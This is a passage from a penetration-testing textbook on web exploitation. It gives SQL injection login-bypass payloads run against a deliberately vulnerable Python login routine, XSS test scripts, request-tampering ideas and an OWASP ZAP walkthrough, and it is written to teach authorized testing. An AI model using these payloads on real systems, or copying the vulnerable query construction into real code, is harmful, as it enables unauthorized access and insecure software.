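To see why these three inputs behave the way they do, it can help to run them against a toy login routine. The following is a minimal sketch, assuming an in-memory SQLite database and a login check that simply concatenates the two textbox values into the query; the users table, the stored passwords, and the login() function are all hypothetical.

```python
import sqlite3

# Hypothetical stand-in for Ben's partner website (assumption: SQLite in memory).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, uname TEXT, pwd TEXT)")
conn.executemany(
    "INSERT INTO users (uname, pwd) VALUES (?, ?)",
    [("admin", "admin-password"), ("partner1", "partner-password")],
)


def login(uname, pwd):
    # Vulnerable construction: both textbox values are pasted into the query.
    query = (
        "SELECT uname FROM users WHERE uname = '" + uname
        + "' and pwd = '" + pwd + "'"
    )
    row = conn.execute(query).fetchone()  # the application uses the first match
    return row[0] if row else None


# A wrong password is rejected when the input is not malicious.
print(login("partner1", "wrong"))

# Known username plus "--": the password check is commented out.
print(login("partner1'--", "syngress"))

# Unknown username: the always-true condition matches every row,
# so the first user in the table is returned.
print(login("' or 1 = 1--", "syngress"))

# Injection in the password field: again every row matches, and the
# application ends up with the first user listed in the table.
print(login("partner1", "' or 1 = 1--"))
```

In this sketch the four calls print None, partner1, admin, and admin. The last result illustrates the point made above: because the “or” condition matches every row, the injection grants access as the first user listed in the table rather than as the username that was typed.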

In all fairness, it should be pointed out that it is becoming harder to find SQL injection errors and to bypass authentication using the techniques listed above. However, this classic example still rears its head on occasion, especially with custom-built apps, and it also serves as an excellent starting point for learning about and discovering the more advanced injection attacks.

Cross-Site Scripting: Browsers that Trust Sites

XSS is the process of injecting scripts into a web application. The injected script can be stored on the original web page and run or processed by each browser that visits the web page. This process happens as if the injected script was actually part of the original code.

XSS is different from many other types of attacks as XSS focuses on attacking the client, not the server. Although the malicious script itself is stored on the web application (server), the actual goal is to get a client (browser) to execute the script and perform an action.

As a security measure, web applications only have access to the data that they write and store on a client. This means any information stored on your machine from one website cannot be accessed by another website. XSS can be used to bypass this restriction. When an attacker is able to embed a script into a trusted website, the victim’s browser will assume all the content including the malicious script is genuine and therefore should be trusted. Because the script is acting on behalf of the trusted website, the malicious script will have the ability to access potentially sensitive information stored on the client including session tokens and cookies.

It is important to point out that the end result or damage caused by a successful XSS attack can vary widely. In some instances, the effect is a mere annoyance like a persistent pop-up window, whereas other more serious consequences can result in the complete compromise of the target. Although many people initially reject the seriousness of XSS, a skilled attacker can use the attack to hijack sessions, gain access to restricted content stored by a website, execute commands on the target, and even record keystrokes!

You should understand that there are numerous XSS attack vectors. Aside from simply entering code snippets into an input box, malicious hyperlinks or scripts can also be embedded directly into websites, e-mails, and even instant messages. Many e-mail clients today automatically render HTML e-mail. Oftentimes, the malicious portion of a malicious URL will be obfuscated in an attempt to appear more legitimate.



In its simplest form, conducting an XSS attack on a web application that does not perform input sanitization is easy. When we are only interested in providing proof that the system is vulnerable, we can use some basic JavaScript to test for the presence of XSS. Website input boxes are an excellent place to start. Rather than entering expected information into a textbox, a penetration tester should attempt to enter the script tag followed by a JavaScript “alert” directly into the field. The classic example of this test is listed below:

<script> alert("XSS Test") </script>

If the above code is entered and the server is vulnerable, a JavaScript “alert” pop-up window will be generated. Figure 6.10 shows an example of a typical web page where the user can login by entering a username and password into the textboxes provided.

FIGURE 6.10 Example of input boxes on a typical web page.

However, as previously described, rather than entering a normal username and password, enter the test script. Figure 6.11 shows an example of the test XSS before submitting.

FIGURE 6.11 XSS test code.

After entering our test script, we are ready to click the “Submit” button. Remember, if the test is successful and the web application is vulnerable to XSS, a JavaScript “alert” window with the message “XSS Test” should appear on the client machine. Figure 6.12 shows the result of our test, providing proof that the application is vulnerable to XSS.

FIGURE 6.12 XSS success!
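The test works because the vulnerable application writes the submitted value back into the page without sanitizing it. The following is a minimal sketch of that behavior, assuming a hypothetical render_login_error() function that builds the response HTML; it is not taken from any real application.

```python
import html


def render_login_error(username, sanitize=False):
    # Hypothetical page fragment that echoes the submitted username.
    if sanitize:
        # Input sanitization: markup characters become harmless entities.
        username = html.escape(username)
    return "<p>Login failed for user: " + username + "</p>"


payload = '<script> alert("XSS Test") </script>'

# Without sanitization the script tag reaches the browser intact and runs.
print(render_login_error(payload))

# With sanitization the browser displays the text instead of executing it.
print(render_login_error(payload, sanitize=True))
```

In the first response, the browser sees a genuine script element and displays the alert. In the second, the angle brackets and quotes arrive as entities such as &lt; and &quot;, so the payload is shown as plain text.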

Just as there are several attack vectors for launching XSS, the attack itself comes in several varieties. Because we are covering the basics, we will look at two examples: reflected XSS and stored XSS.

Reflected cross-site scripts occur when a malicious script is sent from the client machine to a vulnerable server. The vulnerable server then bounces or reflects the script back to the user. In these cases, the payload (or script) is executed immediately. This process happens in a single response/request. This type of XSS attack is also known as a “First-Order XSS”. Reflected XSS attacks are nonpersistent. Thus, the malicious URL must be fed to the user via e-mail, instant message, and so on, so the attack executes in their browser. This has a phishing feel to it and rightfully so.

In some instances, the malicious script can actually be saved directly on the vulnerable server. When this happens, the attack is called a stored XSS. Because the script is saved, it gets executed by every user who accesses the web application. In the case of stored XSS attacks, the payload itself (the malicious script or malformed URL) is left behind and will be executed at a later time. These attacks are typically saved in a database or an applet. Stored XSS does not need the phishing aspect of reflected XSS. This helps the legitimacy of the attack.
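The difference between the two varieties comes down to where the payload lives. The following is a minimal sketch, assuming a hypothetical search page that echoes its query (reflected) and a hypothetical comment page that saves input in a list standing in for the database (stored).

```python
comments = []  # stands in for the application's database (assumption)


def search_page(query):
    # Reflected: the payload arrives in this request and is bounced
    # straight back in this response only.
    return "<h1>Results for " + query + "</h1>"


def post_comment(text):
    # Stored: the payload is saved on the server.
    comments.append(text)


def comments_page():
    # Every later visitor receives whatever was saved earlier.
    items = "".join("<li>" + c + "</li>" for c in comments)
    return "<ul>" + items + "</ul>"


payload = '<script> alert("XSS Test") </script>'

# Reflected: only the user who sends the crafted request gets the script.
print(search_page(payload))
print(search_page("laptop"))  # another user's response is clean

# Stored: the attacker submits once, then every visitor gets the script.
post_comment(payload)
print(comments_page())
print(comments_page())
```

This is why a reflected attack needs the victim to follow a crafted link, while a stored attack only needs the victim to visit the page.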

As mentioned earlier, XSS is a very practical attack. Even though we only examined the simplest of XSS attacks, do not let this deter you from learning about the true power of XSS. In order to truly master this content, you will need to learn how to harness the power of XSS attacks to steal sessions from your target and deliver the other payloads discussed earlier in this section. Once you have mastered both reflected and stored XSS attacks, you should begin examining and studying Document Object Model-based XSS attacks.

ZED Attack Proxy: Bringing It All Together Under One Roof



We have discussed several frameworks to assist with your web hacking; however, before closing the chapter, let us examine one more. In this section, we are going to cover the Zed Attack Proxy (ZAP) from OWASP because it is a full-featured web hacking toolkit that provides the three main pieces of functionality that we discussed at the beginning of this chapter: intercepting proxy, spidering, and vulnerability scanning. ZAP is 100% free and preinstalled in Kali. You can open ZAP from the Kali menu by clicking Applications → Kali Linux → Web Applications → zaproxy. You can also start ZAP by typing the following on the command line:

zap

Before using ZAP, you will need to configure your browser to use a proxy. You can review this process by visiting the “Spidering” section of this chapter. Please note you will need to enter a port number of 8080 rather than 8008 as shown in Figure 6.13.

FIGURE 6.13 Configuring the Iceweasel proxy settings to use ZAP.



After configuring the proxy settings in your browser and starting ZAP, as you browse web pages using Iceweasel, the ZAP “Sites” tab will keep a running history of the URLs you visit. You can expand each URL to show additional directories and pages that you have either visited directly or that have been scraped by ZAP. Figure 6.14 shows that we have visited www.dsu.edu, www.espn.com, www.google.com, and a couple of others.

FIGURE 6.14 The “sites” tab in ZAP showing visited websites that have passed through the proxy.

Intercepting in ZAP

The ability to intercept and change variables before they reach the website is one of the first places you should start with web hacking. Because accepting variables from users’ requests is fundamental to how the web works today, it is important to check whether the website is securely handling these input variables. A simple way to think about this is to build requests that ask these questions:

What would the website do if I tried to order −5 (negative 5) televisions?

What would the website do if I tried to get a $2000 television for $49?

What would the website do if I tried to sign in without even providing a username or password variable? (Not supplying blank username and password variables, but actually not even sending these two variables that the website is surely expecting.)

What would the website do if I used a cookie (session identifier) from a different user that is already currently logged in?

And any other mischievous behavior you can think of!



The great thing is that you are in complete control of what is sent to the website when you use a proxy to intercept the requests as they leave your browser. You can intercept in ZAP by using the “break points” functionality. You can set break points on requests leaving your browser, so the application receives a variable value that was changed. You can also set break points on responses coming back from the website, so you can change the response before it is rendered in your browser. For the basics, we will usually only need to set break points on the outbound requests. Setting break points in ZAP is done by toggling (on or off) the green arrows directly below the menu bar as shown in Figure 6.15.

FIGURE 6.15 Setting break points on all outbound requests in ZAP.



The right-facing green arrow is to set a break point on all outbound requests, so they will be intercepted and available to be edited; as previously mentioned, this is the most common use of break points. It is less common to intercept the returning response from the website. However, when you want to intercept returning responses, you can toggle the left-facing green arrow. Once you have the break points set, the arrow will turn red and the request that is leaving your browser will be displayed in the left pane of ZAP as shown in Figure 6.16.

FIGURE 6.16 An intercepted request headed to google.com where the “search” variable is available to be edited.

Obviously, just changing the search term of this Google search for new golf clubs is not malicious (you can simply type in a new value!), but this does show how easily any variable can be manipulated. Imagine if this were a banking website and you were trying to change the account numbers that money is transferred to and from!
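The edits you make by hand at a break point amount to rewriting the variables in the request before it continues on to the website. The following is a minimal sketch of that idea using only string handling, with no network traffic involved; the request bodies, variable names, and the tamper() helper are hypothetical.

```python
from urllib.parse import parse_qsl, urlencode


def tamper(body, changes=None, drop=()):
    # Parse the intercepted variables, overwrite some, remove others,
    # then rebuild the body that would be forwarded to the website.
    params = dict(parse_qsl(body, keep_blank_values=True))
    params.update(changes or {})
    for name in drop:
        params.pop(name, None)
    return urlencode(params)


# Hypothetical intercepted order request.
order = "item=television&quantity=1&price=2000"

# Ask for negative five televisions.
print(tamper(order, {"quantity": "-5"}))

# Ask for the $2000 television at $49.
print(tamper(order, {"price": "49"}))

# Sign in without sending the username or password variables at all.
login = "username=ben&password=syngress"
print(repr(tamper(login, drop=("username", "password"))))
```

Whether any of these altered requests succeeds depends entirely on how carefully the server validates what it receives, which is exactly what the test is meant to reveal.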



Spidering in ZAP

One of the most beneficial aspects of finding all available pages by spidering is that we will have a larger attack surface to explore. The larger our attack surface is, the more likely an automated web vulnerability scanner can locate an exploitable issue. Spidering in ZAP is very easy. It begins by finding the URL, or a specific directory within that URL, that you would like to spider. This is a good time to remind you that you should not spider a website that you do not own or do not have authorization to perform spidering on. Once you have identified your targeted URL or directory in the “Sites” tab, you can simply right-click on it to bring up the “Attack” ZAP menu as shown in Figure 6.17.

FIGURE 6.17 Opening the attack menu in ZAP.

Notice that both scanning and spidering are available in this “Attack” menu. It is really that easy; you just find the URL or directory (or even page) that you would like to attack and instruct ZAP to do its thing! Once you select “Spider site” from the “Attack” menu, the spider tab will display the discovered pages complete with a status bar to show the progress of the spider tool.
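Conceptually, a spider starts at one page, extracts every link it finds, and repeats the process for each newly discovered page. The following is a minimal sketch of that loop, assuming a tiny hypothetical website held in a dictionary so that the example runs without touching the network; it is an illustration of the idea, not a description of how ZAP is implemented.

```python
from collections import deque
from html.parser import HTMLParser

# Hypothetical five-page website: path -> HTML returned for that path.
SITE = {
    "/": '<a href="/products">Products</a> <a href="/login">Login</a>',
    "/products": '<a href="/products/laptops">Laptops</a> <a href="/">Home</a>',
    "/products/laptops": '<a href="/admin/backup">old link</a>',
    "/login": "<form></form>",
    "/admin/backup": "backup files",
}


class LinkParser(HTMLParser):
    """Collects the href value of every anchor tag on a page."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def spider(start):
    seen = [start]          # pages discovered so far, in order
    queue = deque([start])  # pages still waiting to be crawled
    while queue:
        page = queue.popleft()
        parser = LinkParser()
        parser.feed(SITE.get(page, ""))
        for link in parser.links:
            if link not in seen:
                seen.append(link)
                queue.append(link)
    return seen


print(spider("/"))
```

Starting from the home page, the sketch discovers all five pages, including /admin/backup, which is linked only from a page two levels down. Each discovered page adds to the attack surface available to the scanner.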

Scanning in ZAP

Once the spider has completed its work, the next step is to have the vulnerability scanner in ZAP further probe the selected website for known vulnerabilities. A web scanner is very similar to Nessus in that it is loaded with signatures of known vulnerabilities, so the scanner results are only as good as the signatures that it includes.

When you select “Active Scan site” in the “Attack” menu, ZAP will send hundreds of requests to the selected website. As the website sends back responses, ZAP will analyze them for signs of vulnerabilities. This is an important aspect of web scanning to understand: the scanner is not trying to exploit the website, but rather sends hundreds of proof-of-concept malicious requests to the website and then analyzes the responses for signs of vulnerability. Once an exact page is identified as being plagued by an exact vulnerability (SQL injection on a login page, for example), you can then use the intercepting proxy to craft a malicious request to that exact page with the exact malicious variable values in order to complete the hack!

ZAP also has passive scanning functionality, which does not send hundreds of proof-of-concept requests, but instead simply analyzes every response that your browser receives during normal browsing for the same vulnerabilities as active scanning. This means you can browse like you normally do and review the website for vulnerabilities without raising any suspicion from rapid requests like active scanning.
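The idea of analyzing responses for signs of vulnerability can be sketched as a simple signature match. The signatures, URLs, and response bodies below are hypothetical and far cruder than the checks a real scanner ships with; the sketch only illustrates the principle that results are limited by the signatures available.

```python
import re

# Hypothetical signatures: alert name -> pattern to look for in a response.
SIGNATURES = {
    "Possible SQL injection": re.compile(
        r"error in your SQL syntax|unterminated quoted string", re.I
    ),
    "Possible XSS": re.compile(r"<script>\s*alert\(", re.I),
}


def analyze(url, body):
    # Return one (url, alert) pair for every signature found in the body.
    return [
        (url, name)
        for name, pattern in SIGNATURES.items()
        if pattern.search(body)
    ]


# Hypothetical responses, as they might come back during a scan.
responses = {
    "/login": "You have an error in your SQL syntax near ''''",
    "/search": '<h1>Results for <script> alert("XSS Test") </script></h1>',
    "/about": "<p>About our company</p>",
}

alerts = []
for url, body in responses.items():
    alerts.extend(analyze(url, body))

for url, name in alerts:
    print(url, "->", name)
```

In active scanning the responses come from proof-of-concept requests the scanner sends itself, whereas in passive scanning the same kind of analysis is applied to the responses your browser receives during normal browsing.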

All the scanning results will be housed in the “Alerts” tab for easy review. The full report of ZAP Scanner’s findings can be exported as HTML or Extensible Markup Language via the “Reports” menu.

How Do I Practice This Step?

As mentioned at the beginning of this chapter, it is important that you learn to master the basics of web exploitation. However, finding vulnerable websites on which you are authorized to conduct these attacks can be difficult. Fortunately, the fine folks at the OWASP organization have developed a vulnerable platform for learning and practicing web-based attacks. This project, called WebGoat, is an intentionally misconfigured and vulnerable web server.

WebGoat was built using J2EE, which means it is capable of running on any system that has the Java Runtime Environment installed. WebGoat includes more than 30 individual lessons that provide a realistic, scenario-driven learning environment. Current lessons include all the attacks we described in this chapter and many more. Most lessons require you to perform a certain attack like using SQL injection to bypass authentication. Each lesson comes complete with hints that will help you solve the puzzle. As with other scenario-driven exercises, it is important to work hard and attempt to find the answer on your own before using the help files.

If you are making use of virtual machines in your hacking lab, you will need to download and install WebGoat inside a virtual machine. As discussed previously, WebGoat will run in either Linux or Windows; just be sure to install Java (JRE) on your system prior to starting WebGoat.

WebGoat can be downloaded from the official OWASP website at http://www.owasp.org/. The file you download will require 7zip or a program capable of unzipping a 7z file. Unzip the file and remember the location of the uncompressed WebGoat folder. If you are running WebGoat on Windows, you can navigate to the unzipped WebGoat folder and locate the “webgoat_8080.bat” file. Execute this batch file by double-clicking it. A terminal window will appear; you will need to leave this window open and running in order for WebGoat to function properly. At this point, assuming that you are accessing WebGoat from the same machine you are running the WebGoat server on, you can begin using WebGoat by opening a browser and entering the URL http://127.0.0.1:8080/webgoat/attack.

If everything went properly, you will be presented with a login prompt. Both the username and password are set to: guest.

As a final note, please pay attention to the warnings posted in the “readme” file. Specifically you should understand that running WebGoat outside of a lab environment is extremely dangerous, as your system will be vulnerable to attacks. Always use caution and only run WebGoat in a properly sandboxed environment.

You can also download and install Damn Vulnerable Web App (DVWA) from http://www.dvwa.co.uk/. DVWA is another intentionally insecure application that utilizes PHP and MySQL to provide you with a testing environment.

Where Do I Go from Here?

As has been pointed out several times, there is little doubt that this attack vector will continue to grow. Once you have mastered the basics we discussed in this section, you should expand your knowledge by digging in and learning some of the more advanced topics of web application hacking including client-side attacks, session management, source code auditing, and many more. If you are unsure of what else to study and want to keep up on the latest web-attack happenings, keep an eye on the OWASP “top ten”. The OWASP Top Ten Project is an official list of the top web threats as defined by leading security researchers and top experts.

If you are interested in learning more about web hacking, check out the Syngress book The Basics of Web Hacking: Tools and Techniques to Attack the Web by Dr. Josh Pauli. It is an excellent read and will pick up nicely where this chapter left off.

Additional Resources

When it comes to web security, it is hard to beat OWASP. As previously mentioned, a good place to start is the OWASP Top Ten Project. You can find the list at http://www.owasp.org website or by searching Google for “OWASP top ten”. You should keep a close eye on this list, as it will continue to be updated and changed as the trends, risks, and threats evolve.

It should be pointed out that the WebSecurify tool we discussed earlier in the chapter is capable of automatically testing for all threat categories listed in the OWASP Top Ten Project!

Since we are talking about OWASP, and since its members have graciously provided you with a fantastic tool for learning about and testing web application security, it is worth noting that there are many benefits to joining the OWASP organization. Once you are a member, there are several different ways to get involved with the various projects and continue to expand your knowledge of web security.

Along with the great WebScarab project, you should explore other web proxies as well. Both the Burp Proxy and Paros Proxy are excellent (and free) tools for intercepting requests, modifying data, and spidering websites.

Finally, there are several great tools that every good web penetration tester should become familiar with. One of my colleagues and close friends is a very skilled web app penetration tester, and he swears up and down that Burp Suite is the best application testing tool available today. After reviewing many web auditing tools, it is clear that Burp is indeed a great tool. A free version of the Burp Suite is built into Kali and can be found by clicking Applications → Kali Linux → Web Applications → Web Application Proxies → Burp Suite.

If you are not using Kali, the free version of Burp can be downloaded from the company’s website at http://portswigger.net/burp/download.html.

Summary

Because the web is becoming more and more “executable” and because nearly every target has a web presence, this chapter examined web-based exploitation. The chapter began with an overview of the basics of web attacks and by reviewing techniques and tools for interrogating web servers. The use of Nikto and w3af was covered for locating specific vulnerabilities in a web server. Exploring the target website by discovering directories and files was demonstrated through the use of a spider. A method for intercepting website requests by using WebScarab was also covered. Code injection attacks, which constitute a serious threat to web security, were explored. Specifically, we examined the basics of SQL injection attacks. The chapter then moved into a brief discussion and example of XSS. Finally, ZAP was covered as a single tool for conducting web scanning and attacking.